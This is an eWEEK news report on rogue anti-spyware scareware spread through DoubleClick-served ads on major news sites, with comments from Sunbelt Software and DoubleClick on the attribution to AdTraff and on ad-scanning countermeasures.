Rogue anti-spyware software that pushes fraudulent PC scans has found its way onto DoubleClick and legitimate sites, including CNN, The Economist, The Huffington Post and the official site of the Philadelphia Phillies.
DoubleClick officials told eWEEK that they have recently implemented a security monitoring system to catch and disable a new strain of malware that has spread over the past several months. This system has already captured and disabled about 100 ads, the company said in a statement, although it didnt mention this episode in particular.
The bogus anti-spyware onslaught is only part of a bigger wave thats also included porno ads being swapped for normal ads on sites such as The Wall Street Journal. Its not yet clear whether the same fraudsters are behind both the porn and the fraudulent anti-spyware ads.
Sunbelt Software has confirmed that Trojans were being downloaded from ads served by DoubleClick as recently as Nov. 11. This malware is the kind that repeatedly pops bogus warning messages about computer infections in users faces until they give up in despair and pay $30 to $40 for a junk “security” program.
“The stuff thats installed is this rogue anti-spyware software that … gives you fake alerts, [such as] Your computer is infected, you must run this. Basically its extortion. … They try to push you to buy their software,” Sunbelt President Alex Eckelberry told eWEEK.
Read here about how most malware is made in China.
The malware application is a variant on WinFixer, a piece of malware that pretends to be a diagnostic tool.
These arent Trojans that steal account information, but they are illegal due to misleading advertising and other statutes. “It just pummels you with these alerts that your machine is infected, your machine is infected. It just wears you down. Its not stealing information, its not a virus. It just convinces you to spend $30 to $40 to buy their absolutely garbage application. Once it gets on your machine, it will pound you. Every time you start up your machine,” it will pester users with bogus scareware warnings, Eckelberry said.
He said Sunbelt will be contacting the Federal Trade Commission Nov. 12.
The reach of DoubleClick, one of the Internets largest online advertising services, is vast, to the extent that the scope of the impact is unknown. However, the only sites at risk are those that signed agreements with the advertiser that is distributing the malware in question, a German marketing company called AdTraff.
Its not DoubleClick which is ultimately responsible. DoubleClick is an ad-serving platform that only provides the technology used by publishers to deliver ads from advertisers with whom the publishers have signed agreements. DoubleClick does not directly deal with the advertisers, although it does attempt to protect its clients from malicious code masking as advertisements by checking on materials stored in its database.
“We view the security aspect as one part of our service, but we make it clear to [clients] that they have to do sufficient quality assurance,” said Sean Harvey, senior product manager for DoubleClicks ad management platform. “They have to be checking with advertisers to make sure theyre legitimate, and to make sure the creative is not malicious.”
Recently, DoubleClick discovered one company in particular that was trying to sign direct deals with publishers. DoubleClick found that the rich media ad in question was clean but called an external file that would in turn call something else, in a “very creepy, encrypted kind of way,” Harvey said. “It was very hidden, very hard to see what was going on, and it would call [a] malware site.”
Because of that find, DoubleClick has since deployed a mechanism for scanning advertising material, not because its responsible for the safety of the materials that customers store in its systems, Harvey said, but as a service to its customers and to protect its reputation.
The sites involved—The Economist and the others—are ultimately responsible for any malicious code delivered through their ads or sites.
EWEEKs publisher, Ziff Davis Enterprise, is a DoubleClick customer. ZDEs networks have not been infected with the ads, most of which are associated with affiliate marketers.
DoubleClick Serves Up Vast
On Nov. 12, Web sites marketing professionals were flooding industry e-mail lists with reports of complaints from readers that they have been receiving inappropriate ads. Marketing professionals have complained of their ad servers being “hijacked” at sites, including The Wall Street Journal, Discovery and BizJournals. Its not that the servers have been hijacked, Harvey said, but rather that a toolbar or some other mechanism is overlaying the intended ad with inappropriate content.
“It looks like we are all in the same boat,” one marketer said in a message to the mailing list.
Another marketer said his company had already shut down one of its networks that was devoted to serving up ads and had suspended all third-party ads on another site.
Its not clear yet whether all the sites are having the same problem, given that some sites are delivering the bogus anti-spyware and others are experiencing normal ads being replaced with ads for porn or other inappropriate material.
To read about why the Google-DoubleClick deal is facing Senate scrutiny, click here.
As for the bogus anti-spyware code its origin the German company AdTraff.com. AdTraff had not responded to inquiries as of the time this article posted. Google, which has proposed a $3.1 billion buyout of DoubleClick, declined to comment.
Harvey said in a statement that this is “an industry-wide challenge; unfortunately, there are bad actors who misrepresent themselves and purchase advertising as an avenue to distribute malware. This has the potential to affect all businesses and consumers in the online environment.”
Even as DoubleClick monitors its online environment for malware—it has a dedicated team that works around the clock on the issue—malware writers are working to adapt to its new security measures, Harvey said in the statement.
“As with any system (Norton, McAfee, etc.) designed to root out bad actors, there are going to be times when the bad actors are a step ahead—when this occurs, we immediately cease serving the infected ads, and then work to refine our system so that similar ads are captured and disabled before they are ever served (just like when Norton provides a patch in response to a new threat),” the statement said.
DoubleClick has alerted its clients, particularly publishing clients, of the need to pay close attention to the advertisers, agencies and networks with which they work.
When clicked on, the bogus anti-spyware ad presents in the lower right-hand screen corner a dialog box informing users that their computer is infected and that they need to download a scanner immediately.
Warning: If clicking on the following link, do not click “OK” to any dialog boxes; instead, simply close out the browser window. This is a link to the bogus infection scan thats presented to victims. Eckelberry said that the Trojan consistently reports that malware has been found even on systems known to the security firm to be perfectly clean.
Sunbelt and other security researchers see this type of misleading ad, which uses convincing warning dialog boxes that look like legitimate Windows messages, on a regular basis.
Adam Thomas, a researcher at Sunbelt, said the IP address for the AdTraff.com ads overlaps with those used by Innovative Marketing, which has a long history of misleading on the Internet. AdTraff.coms domain registration also lists the same Yahoo.com e-mail address as Innovative Marketing, Thomas said.
“These guys are just slimy advertising guys,” Eckelberry said.
Ad hijacking is a constant problem, Eckelberry said. That makes it essential that online publishers and others who serve ads vet the advertisers to whom they hand their space—and their visitors eyeballs.
Editors Note: This story was updated to include comments from Sean Harvey, to correct its original depiction of DoubleClicks culpability and to clarify Web publishers culpability in serving malicious code.
Check out eWEEK.coms Security Center for the latest security news, reviews and analysis. And for insights on security coverage around the Web, take a look at eWEEKs Security Watch blog.